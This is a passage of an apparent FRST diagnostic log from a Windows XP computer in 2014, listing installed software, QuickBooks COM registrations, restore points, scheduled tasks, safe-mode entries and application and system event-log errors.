MSXML 4.0 SP2 Parser and SDK (HKLM\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MSXML 6.0 Parser (KB927977) (HKLM\...\{5A710547-B58E-488B-828D-CA9A25A0533C}) (Version: 6.00.3890.0 - Microsoft Corporation)
PowerDVD DX (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.2.5024 - Dell Corp.)
QuickBooks (Version: 19.0.4011.705 - Intuit Inc.) Hidden
QuickBooks (Version: 22.0.4014.2206 - Intuit Inc.) Hidden
QuickBooks Premier: Accountant Edition 2012 (HKLM\...\{2181214D-1954-4C60-91FD-EEA7EBB32022}) (Version: 22.0.4014.2206 - Intuit Inc.)
QuickBooks Pro 2009 (HKLM\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4011.705 - Intuit Inc.)
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Readiris Pro 12 (HKLM\...\{3AC26580-A695-4134-84AE-5121B3AAE545}) (Version: 12.00.5965 - I.R.I.S.)
SpyHunter (HKLM\...\{B2C80E75-2409-48EC-8D48-28113DF74915}) (Version: 4.17.6.4336 - Enigma Software Group USA, LLC)
TeamViewer 7 (HKLM\...\TeamViewer 7) (Version: 7.0.13989 - TeamViewer)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 7 (KB980182) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows Internet Explorer 8 (KB976662) (HKLM\...\KB976662-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB982632) (HKLM\...\KB982632-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676) (HKLM\...\KB2616676) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951618-v2) (HKLM\...\KB951618-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Driver Package - Citrix Systems monblanking Citrix Driver  (04/25/2013 6.2.101.0) (HKLM\...\831FB1509292986F102B3AB7C8451FA1EA13B0F7) (Version: 04/25/2013 6.2.101.0 - Citrix Systems)
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Management Framework Core (HKLM\...\KB968930) (Version:  - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
Windows Presentation Foundation (Version: 3.0.6920.0 - Microsoft Corporation) Hidden
Winmail Opener 1.4 (HKLM\...\Winmail Opener) (Version: 1.4 - Eolsoft)
Workspace Desktop (HKCU\...\workspacedesktop) (Version:  - Starfield Technologies)
XML Paper Specification Shared Components Pack 1.0 (Version:  - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{05EC5C13-D255-4592-9CCB-98615172F0D6}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{0ADF9C35-0D5E-4B75-88DD-B64868907E17}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{123FAF7F-3FB1-4B8F-AD18-0047401D436A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{37A2FC00-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{37A2FC02-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4716D3CE-55DB-4D2A-818C-87D912895890}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4844F3F7-2161-4AC4-B219-B3B4311782AA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4A56F19E-9F50-4F43-93C8-050E44AA83A9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4CA41277-032D-4a20-B225-371EBA96ABF2}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{53B5243F-8302-4DAD-BE8F-1D0665E8225E}\InprocServer32 -> C:\Program Files\HP\Common\FWUpdateEDO3.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5428A9ED-6CD8-11D6-9C8A-0001023DCAA2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{547C8F00-5567-4AE3-8BB0-CC3CE2AB9070}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{57D590F1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{596801D8-2C9D-4627-9C67-195CB81B655A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5B7331FA-8910-4748-A8A4-60B445041F28}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5ED8AC89-B2DE-476D-8EEA-E170B2FCB058}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{7694F1CD-A55B-4B7C-8820-A90892EB4E9E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{7DBF8260-30AD-4D1B-876A-8032B87B809F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{828E5386-74CF-4019-B356-C857CD028A7D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{82CC31B3-53B4-4161-A4E9-6B4F1290A6C8}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{8E590317-1329-11D1-B70B-00805F29CD16}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{8FEDE364-AB37-4551-80C9-6D468E222AB2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F2-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F3-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F4-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F5-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F6-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F7-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{A63E42D0-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{A63E42D2-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{AF5E0A13-CEAB-47CE-991D-77E82CD1BF3F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{B10BFAC3-EFF1-40D9-ADA0-BEBE037C24CA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{B66F2BF1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{D14FD6B3-6A9F-4537-9460-07B836707127}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{D4A12AAF-E15E-470B-A6B6-63032186F91F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{DCB2B478-EFF6-48F6-B718-13E98876854E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{DFD0AF10-B86C-4AF3-B609-1348D513E565}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E1A173E1-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E1A173E3-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E778B152-9033-4C89-8993-2853CCAF683E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{EADA914E-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{F2C593CC-74B2-4F71-8556-DD4D426D0409}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{FAC93D42-FFC2-11d1-9DEB-0008C7A08EBA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{FB17915F-06D1-4214-A902-CC5EE05186E9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)

==================== Restore Points  =========================

02-06-2014 23:36:53 System Checkpoint
04-06-2014 01:30:58 System Checkpoint
05-06-2014 03:30:58 System Checkpoint
06-06-2014 05:29:59 System Checkpoint
07-06-2014 07:29:59 System Checkpoint
08-06-2014 21:48:28 System Checkpoint
09-06-2014 23:17:27 System Checkpoint
11-06-2014 01:16:16 System Checkpoint
12-06-2014 03:16:23 System Checkpoint
13-06-2014 03:17:58 System Checkpoint
14-06-2014 05:17:59 System Checkpoint
15-06-2014 07:17:53 System Checkpoint
16-06-2014 09:17:59 System Checkpoint
17-06-2014 11:17:58 System Checkpoint
18-06-2014 19:56:53 System Checkpoint
19-06-2014 21:17:53 System Checkpoint
20-06-2014 23:16:49 System Checkpoint
22-06-2014 03:58:24 System Checkpoint
23-06-2014 05:16:50 System Checkpoint
24-06-2014 07:15:35 System Checkpoint
25-06-2014 09:15:43 System Checkpoint
26-06-2014 09:52:30 System Checkpoint
27-06-2014 11:03:55 System Checkpoint
29-06-2014 23:36:12 System Checkpoint
01-07-2014 02:01:44 System Checkpoint
02-07-2014 03:02:47 System Checkpoint
03-07-2014 05:01:46 System Checkpoint
04-07-2014 07:01:48 System Checkpoint
05-07-2014 09:01:39 System Checkpoint
06-07-2014 18:12:05 System Checkpoint
07-07-2014 19:01:43 System Checkpoint
08-07-2014 21:00:45 System Checkpoint
09-07-2014 23:42:13 System Checkpoint
10-07-2014 23:46:21 System Checkpoint
12-07-2014 00:59:16 System Checkpoint
14-07-2014 04:19:26 System Checkpoint
15-07-2014 06:16:02 System Checkpoint
16-07-2014 08:15:57 System Checkpoint
17-07-2014 09:35:49 System Checkpoint
18-07-2014 10:13:15 System Checkpoint
19-07-2014 11:35:53 System Checkpoint
20-07-2014 12:11:49 System Checkpoint
21-07-2014 13:34:49 System Checkpoint
22-07-2014 17:04:54 System Checkpoint
23-07-2014 18:13:53 System Checkpoint
24-07-2014 18:27:23 System Checkpoint
25-07-2014 20:13:57 System Checkpoint
29-07-2014 01:59:53 System Checkpoint
30-07-2014 02:29:55 System Checkpoint
31-07-2014 04:13:57 System Checkpoint
01-08-2014 04:26:41 System Checkpoint
02-08-2014 06:26:37 System Checkpoint
06-08-2014 13:21:00 System Checkpoint
07-08-2014 14:26:37 System Checkpoint
08-08-2014 16:26:28 System Checkpoint
13-08-2014 13:56:14 System Checkpoint
14-08-2014 15:27:08 System Checkpoint
15-08-2014 17:27:08 System Checkpoint
19-08-2014 16:27:26 System Checkpoint
20-08-2014 17:27:13 System Checkpoint
21-08-2014 19:27:08 System Checkpoint
22-08-2014 21:27:08 System Checkpoint
26-08-2014 04:38:30 System Checkpoint
27-08-2014 05:00:19 System Checkpoint
28-08-2014 07:00:21 System Checkpoint
29-08-2014 09:32:58 System Checkpoint
31-08-2014 18:15:05 Installed %1 %2.
31-08-2014 19:49:56 Removed SupportSoft Assisted Service
01-09-2014 00:21:39 Removed Google Earth Plug-in.
01-09-2014 01:12:06 Installed SpyHunter

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-08-31 21:13 - 2014-08-31 21:13 - 00000000 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\AppleSoftwareUpdate.job => C:\Program Files\Apple Software Update\SoftwareUpdate.exe
Task: C:\WINDOWS\Tasks\At1.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At10.job => ?
Task: C:\WINDOWS\Tasks\At12.job => ?
Task: C:\WINDOWS\Tasks\At14.job => ?
Task: C:\WINDOWS\Tasks\At16.job => ?
Task: C:\WINDOWS\Tasks\At18.job => ?
Task: C:\WINDOWS\Tasks\At2.job => ?
Task: C:\WINDOWS\Tasks\At20.job => ?
Task: C:\WINDOWS\Tasks\At22.job => ?
Task: C:\WINDOWS\Tasks\At24.job => ?
Task: C:\WINDOWS\Tasks\At26.job => ?
Task: C:\WINDOWS\Tasks\At28.job => ?
Task: C:\WINDOWS\Tasks\At30.job => ?
Task: C:\WINDOWS\Tasks\At32.job => ?
Task: C:\WINDOWS\Tasks\At34.job => ?
Task: C:\WINDOWS\Tasks\At36.job => ?
Task: C:\WINDOWS\Tasks\At38.job => ?
Task: C:\WINDOWS\Tasks\At4.job => ?
Task: C:\WINDOWS\Tasks\At40.job => ?
Task: C:\WINDOWS\Tasks\At42.job => ?
Task: C:\WINDOWS\Tasks\At44.job => ?
Task: C:\WINDOWS\Tasks\At46.job => ?
Task: C:\WINDOWS\Tasks\At48.job => ?
Task: C:\WINDOWS\Tasks\At49.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At50.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At51.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At6.job => ?
Task: C:\WINDOWS\Tasks\At8.job => ?
Task: C:\WINDOWS\Tasks\DriverCure.job => C:\Program Files\ParetoLogic\DriverCure\DriverCure.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HP WEP.job => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exeLW$Task for execution of hpbdfawep.exe
Task: C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2013-07-08 13:34 - 2013-07-08 13:34 - 00057344 _____ () C:\Program Files\24im\24im Messenger\IMHOOK2.dll
2010-10-25 15:36 - 2010-10-25 15:36 - 00119864 _____ () C:\Program Files\HP\ToolboxFX\bin\nativeutils.dll
2008-04-25 12:16 - 2008-04-14 08:00 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll
2008-04-25 12:16 - 2008-04-14 08:00 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: egui => "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/01/2014 11:51:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application firefox.exe, version 30.0.0.5269, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (09/01/2014 10:59:06 AM) (Source: Application Error) (EventID: 1004) (User: )
Description: Faulting application g2ax_processfactory.exe, version 2.1.0.715, faulting module g2ax_processfactory.exe, version 2.1.0.715, fault address 0x000019ac.
Error in creating result PEAP-TLV in response to received PEAP-TLV (g2ax_processfactory.exe!ld!)

Error: (09/01/2014 10:58:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application g2ax_processfactory.exe, version 2.1.0.715, faulting module g2ax_processfactory.exe, version 2.1.0.715, fault address 0x000019ac.
Processing media-specific event for [g2ax_processfactory.exe!ws!]

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application rundll32.exe, version 5.1.2600.5512, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application rundll32.exe, version 5.1.2600.5512, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:57:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application mbam.exe, version 1.51.0.1118, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:30:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:14:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.


System errors:
=============
Error: (09/01/2014 00:17:41 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 1 time(s).

Error: (09/01/2014 00:08:03 PM) (Source: Schedule) (EventID: 7901) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942402

Error: (09/01/2014 00:01:47 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 00:01:15 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:59:49 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:59:14 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:58:08 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:56:03 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:54:35 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:54:02 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.


Microsoft Office Sessions:
=========================
Error: (09/01/2014 11:51:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: firefox.exe30.0.0.5269hungapp0.0.0.000000000

Error: (09/01/2014 10:59:06 AM) (Source: Application Error) (EventID: 1004) (User: )
Description: g2ax_processfactory.exe2.1.0.715g2ax_processfactory.exe2.1.0.715000019ac

Error: (09/01/2014 10:58:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: g2ax_processfactory.exe2.1.0.715g2ax_processfactory.exe2.1.0.715000019ac

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: rundll32.exe5.1.2600.5512hungapp0.0.0.000000000

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: rundll32.exe5.1.2600.5512hungapp0.0.0.000000000

Error: (08/31/2014 03:57:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
